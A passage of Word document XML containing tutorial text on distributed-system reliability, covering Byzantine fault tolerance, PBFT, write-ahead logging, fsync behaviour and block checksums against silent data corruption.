    <w:p w14:paraId="39B0954B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Standby redundancy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Spare component takes over when primary fails (active-passive failover).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C243B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 The Byzantine Generals Problem — When Components Lie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E6B7EF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The standard assumption:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Failed components stop responding (crash-stop model). Easy to detect — no response means failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B371F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Byzantine failure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A failed component continues operating but produces INCORRECT results. It may:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EE7E4D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Send different values to different recipients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7001DF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Claim to be healthy while producing wrong answers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D04C729" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Actively collude with other faulty components (in adversarial settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B59798A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72987088" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A corrupted server returns balance = $1,000,000 instead of balance = $100. The client trusts it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D220398" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A storage node reports "write successful" but actually lost the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0D786" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A sensor reports normal temperature while the system is overheating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8932CE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Byzantine Fault Tolerance (BFT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306EDDE1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>To tolerate f Byzantine faults, you need at least 3f + 1 total nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842E0CC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>1 Byzantine fault → need 4 nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B6C6B5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>2 Byzantine faults → need 7 nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F1C401" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How PBFT (Practical Byzantine Fault Tolerance) works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F92153" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-prepare:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The leader proposes an operation to all replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07802128" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prepare:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each replica broadcasts a prepare message to all others ("I received this proposal").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5984B141" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Once a replica sees 2f + 1 prepare messages, it broadcasts commit ("I'm ready to execute").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290ED85" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execute:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Once a replica sees 2f + 1 commit messages, it executes the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4D82B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This ensures all honest nodes agree, even if f nodes are lying or unresponsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78159CB8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world relevance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A3A66" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Blockchain consensus (Bitcoin, Ethereum) — trustless environment with potential malicious actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0F4920" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Critical financial systems — where a single incorrect computation has catastrophic consequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28752406" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Space systems — radiation can flip bits, making a computer "lie" about sensor readings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F3B407" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For most distributed systems:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Byzantine tolerance is too expensive. We assume crash-stop failures (components either work correctly or stop). This simplifies consensus to protocols like Raft/Paxos (which only need 2f + 1 nodes for f crash failures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E2CB7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="2DF995A8">
          <v:rect id="_x0000_i2933" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2216167D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Data Reliability — Ensuring Data is Never Lost or Corrupted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469811E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Durability vs. Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B2F39" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Durability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Once data is acknowledged as written, it will not be lost (even if hardware fails).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F5095" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Reliability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Data remains correct and retrievable — encompasses durability plus protection against corruption, logical errors, and deletions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E34AC7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Write-Ahead Logging (WAL) — The Foundation of Data Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B8AEA7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201107E6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>A database update modifies multiple data structures (the row data, indexes, free-space maps). If the system crashes mid-update, some structures reflect the new state and others the old state → inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4868C41E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How WAL ensures reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76388A43" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Before modifying any data file</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, write the intended changes sequentially to a log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721D2499" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fsync the log to disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (ensure the kernel's buffer cache is flushed to physical media).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6311EFF3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acknowledge to the client</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — "your write is durable."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422F2C8C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Later (asynchronously)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, apply the changes to actual data files (called "checkpointing").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CCC696" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On crash recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB2629" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Read the WAL from the last completed checkpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023B92E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Replay all logged operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583DBB9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Data files are brought to a consistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E912305" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why sequential log writes are reliable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F95659" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Appending to a sequential log is the simplest possible I/O pattern — one write position, no seeking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087284F4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Minimal window for corruption (single append vs. scattered random writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C633858" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Even if the system crashes during the log write itself, the incomplete entry is detected by its checksum and discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7575482E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fsync subtlety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F001A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Calling write() in Linux moves data to the kernel page cache — not to disk. A power failure loses page cache contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A93B4CB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>fsync() forces the kernel to flush to the physical disk controller. But even then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8BB74C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Disk controllers have write caches. A controller that reports "done" before actually writing to platters will lose data on power failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E03B97F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Enterprise disks have battery-backed write caches (BBU) that protect against this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF023A4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Consumer SSDs may or may not honor fsync correctly (some lie for performance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9410A3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This is why database reliability depends on hardware honesty</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> about fsync guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F10AE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Checksums — Detecting Silent Data Corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FF0C0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem — bit rot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903D43B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Data stored on disk slowly degrades:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1DD83" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Magnetic domains decay over time (HDDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CBAAA8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Charge leakage in flash cells (SSDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275EAE1F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Cosmic rays flip bits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764AB2DA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Firmware bugs write data to wrong sectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABC3C00" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>None of these trigger I/O errors.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The disk happily returns corrupted data. This is "silent data corruption" — the most dangerous reliability threat because it's invisible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12568792" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How systems protect against it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9BAF07" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-block checksums (ZFS, Btrfs, HDFS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9661DB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>When writing a 4KB data block, compute a checksum (CRC32C or xxHash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334DEE1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Store the checksum separately from the data (in metadata, on a different disk sector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E575326" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On every read, recompute the checksum from the data.</w:t>
      </w:r>
    </w:p>
